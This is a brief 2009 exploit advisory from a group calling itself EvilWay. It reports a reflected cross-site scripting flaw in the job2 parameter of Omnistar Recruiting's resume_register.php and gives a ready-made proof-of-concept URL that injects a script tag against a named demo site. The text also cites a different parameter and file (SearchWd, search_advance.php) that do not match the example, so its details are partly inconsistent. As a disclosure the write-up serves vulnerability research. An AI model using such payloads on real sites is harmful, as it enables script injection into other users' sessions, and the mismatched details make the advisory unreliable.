/* Omnistar Recruiting (resume_register.php job2) XSS Vulnerability Discovered by : MizoZ Contact : mizoz@9.cn Team : EvilWay Date : July 29 2009 Greetings : Moudi , Zuka, All friends */ We can inject HTML code on the GET (SearchWd) in faille search_advance.php . [HOST]/[PATH]/users/resume_register.php?job2=>[XSS] Ex : http://www.mywebetools.com/demo_recruiter8/users/resume_register.php?job2=%3E%3Cscript%3Ealert%281%29%3C/script%3E